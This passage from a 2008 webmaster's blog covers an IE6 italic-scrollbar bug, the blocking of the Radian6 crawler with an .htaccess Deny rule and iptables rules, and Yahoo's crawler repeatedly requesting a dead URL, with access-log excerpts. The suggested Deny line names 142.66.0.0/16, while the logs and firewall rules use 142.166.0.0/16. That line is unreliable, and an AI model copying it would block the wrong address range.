First off, my layout here complies to HTML Strict 1.0. It would even validate as HTML Strict 1.1 after a minor configuration change on my web server (so that it uses a different mime type for html documents). My CSS file I use also validates without the slightest warning. Now to the description:
Whenever I use a block element that has an embedded <i> or <em> tag (to mark a quote for example) or alternatively, I define italic as style for a block element and it contains text that stretches over multiple lines, IE 6.0 on Windows will freak out and add horizontal scrollbars without a visible cause. These bars disappear as soon as I remove italic from the offending style or the embedded <i> or <em> tag from the affected block element.

Perhaps someone incidentally reading this post knows how to work around this problem or a link pointing to a working hack? Any hint would be greatly appreciated, as I really would like to learn what exactly is causing this issue.

Comments (4)

January 9th, 2008

Radian6 – an abusive crawler from Canada

Filed under: Web — olliver @ 14:42 h

The above headline might be irritating, because at first glance Radian6 obeys robots.txt. However, once it is blocked by a server, it switches its user agent to some generic java client and continues indexing. Anyway, before I go on, let me first introduce you to Radian6, its origins and purposes:

Radian6 is a crawler from Canada and its purpose becomes clear just by looking at the first lines on its home page:

Millions of blog posts. Viral videos. Reviews in forums. Sharing of photos. Status updates via microblogging. All conversations, all happening online right now and affecting brands, reputations, sales, you name it.

This is classic marketing speak at its best, and right, the company behind radian6 provides marketing and promotion professionals with the latest “trends” in the blogosphere, so their customers can pick them up and modify their advertising campaigns accordingly, as you can read on this page. To me this boils down to bullying sites with a PR machinery, pushing them aside into irrelevance and snatching trends and slogans for corporate advertising or promo campaigns. All fine and dandy, but who am I to support the advertising industry by providing keywords they can eventually use against me? The bot is to no benefit for me as I do not get to see its index unless I pay for it. Add the fact that Radian6 shows a broken crawling behaviour with pulling the same content multiple times a day and omits trailing slashes in urls (resulting in even more waste of traffic as each request has to be redirected to the actual location), and the only conclusion for me is to deny this bot. And that means on my server 403 Forbidden:

142.166.3.122 - - [09/Jan/2008:03:20:01 +0100]
"GET /feed/ HTTP/1.1" 403 215 "-" "R6_FeedFetcher_(www.radian6.com/crawler)"
142.166.3.122 - - [09/Jan/2008:06:39:35 +0100]
"GET /feed/ HTTP/1.1" 403 215 "-" "R6_FeedFetcher_(www.radian6.com/crawler)"
142.166.3.123 - - [09/Jan/2008:09:46:53 +0100]
"GET /feed/ HTTP/1.1" 403 215 "-" "R6_FeedFetcher_(www.radian6.com/crawler)"
142.166.3.122 - - [09/Jan/2008:12:50:18 +0100]
"GET /feed/ HTTP/1.1" 403 215 "-" "R6_FeedFetcher_(www.radian6.com/crawler)"

Now one would think at some time a legitimate bot will eventually give up and move on to more commerce friendly hosts. But that turned out to be wishful thinking, as the bot seems to have inherited a mental deficiency that prevents it from accepting that someone does not want to see it:

142.166.3.122 - - [09/Jan/2008:03:19:26 +0100]
"GET /robots.txt HTTP/1.1" 200 77 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:03:19:27 +0100]
"GET /a-new-release-i-finally-got-started HTTP/1.1" 301 5 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:03:19:28 +0100]
"GET /a-new-release-i-finally-got-started/ HTTP/1.1" 200 9582 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:03:20:01 +0100]
"GET /robots.txt HTTP/1.1" 200 77 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:06:39:33 +0100]
"GET /a-new-release-i-finally-got-started HTTP/1.1" 301 5 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:06:39:34 +0100]
"GET /a-new-release-i-finally-got-started/ HTTP/1.1" 200 9582 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:09:46:50 +0100]
"GET /a-new-release-i-finally-got-started HTTP/1.1" 301 5 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:09:46:51 +0100]
"GET /a-new-release-i-finally-got-started/ HTTP/1.1" 200 9582 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:09:46:53 +0100]
"GET /robots.txt HTTP/1.1" 200 77 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:12:50:16 +0100]
"GET /a-new-release-i-finally-got-started HTTP/1.1" 301 5 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:12:50:17 +0100]
"GET /a-new-release-i-finally-got-started/ HTTP/1.1" 200 9582 "-" "Java/1.5.0_11"

Why is it, that some outfits in the promotion and marketing industry (and their most radical variant called “spammers”) have such a disregard for individuals and believe everyone gladly accepts their “message blast” if it is only repeated often enough? Why do they cherish the delusion of being special, excempt from common ethical standards and more gifted and intelligent than their targetted “consumer base”? I assume they do not put such questions into consideration or accept opinions contrary to theirs, therefore I decided to add the netblock 142.66.0.0/16 to my growing list of firewalled ip ranges to prevent any more “stealth visits”.

In case you wish to opt out from their visits too, simply add the following line to your .htaccess or httpd.conf file:

Deny from 142.66.0.0/16

Or, in case you are fortunate enough to run a dedicated server and do not expect any welcome visitors from that ip allocation, you may prefer to firewall their range right away:

iptables -A INPUT -s 142.166.0.0/16 -i eth0 -p tcp -m tcp --dport ! 25 -j DROP

This rule leaves port 25 (SMTP) open as communication channel. Since this is a rather large chunk of addresses, it may well contain responsible companies and individuals and for those I still want to be reachable via email. Of course, if you do not have any such concerns you can also apply the BOFH method and silence this range entirely:

iptables -A INPUT -s 142.166.0.0/16 -i eth0 -p tcp -j DROP
Comments (2)

January 7th, 2008

Yahoo loves kurzfilm and can’t let it go…

Filed under: Web — olliver @ 22:01 h

This romance started back in December:
One fine day, shortly before Christmas, I noticed some weird requests by Yahoo’s crawler:

74.6.28.164 - - [23/Dec/2007:08:25:16 +0100] "GET /kurzfilm/ HTTP/1.0" 301 307 "-"
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.28.164 - - [23/Dec/2007:08:25:17 +0100] "GET /kurzfilm/ HTTP/1.0" 404 275 "-"
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

Of course there was no directory called “kurzfilm” on my server, but it seemed some stale link was pointing to it and Yahoo checked to see whether there is something new to discover. If you look closely you spot a 301 redirect before the actual 404 response. That is because I use mod rewrite to redirect any request that does not use “www.mydomain.com” as host to that location first, in order to ensure, that only this version of my domains will appear in search results. After some research I was even able to locate the origin: Some Dutch website used to link to it using the server’s ip address. Unfortunately this was a fatal mistake as Yahoo is now querying this non existent “kurzfilm” directory over and over again.

Google behaves different in that regard: Once it cannot find anything there it soon discards the url and moves on. Also it obeys 301 (moved permanently) redirects and discards the previous destination after a while. But Yahoo?

Yahoo loves “kurzfilm” in the morning:

74.6.28.164 - - [06/Jan/2008:09:08:59 +0100] "GET /kurzfilm/ HTTP/1.0" 301 236 "-"
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.28.164 - - [06/Jan/2008:09:09:01 +0100] "GET /kurzfilm/ HTTP/1.0" 404 5883 "-"
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

And “kurzfilm” in the evening:

74.6.28.164 - - [06/Jan/2008:20:02:50 +0100] "GET /kurzfilm/ HTTP/1.0" 301 236 "-"
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.28.164 - - [06/Jan/2008:20:02:52 +0100] "GET /kurzfilm/ HTTP/1.0" 404 5883 "-"
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

Did you notice the 301 redirect? That means Yahoo is still using the server’s ip address for its request, despite the 301 redirect, which should normally signalise that a request be permanently turned to the new destination instead. But then again it would not be Yahoo and so I shall expect to find “kurzfilm” in my logfiles around this time next year, too. Maybe I should create this “kurzfilm” directory already, just for Yahoo: The “kurzfilm” search engine # 1 :-).

Comments (0)

Older Posts »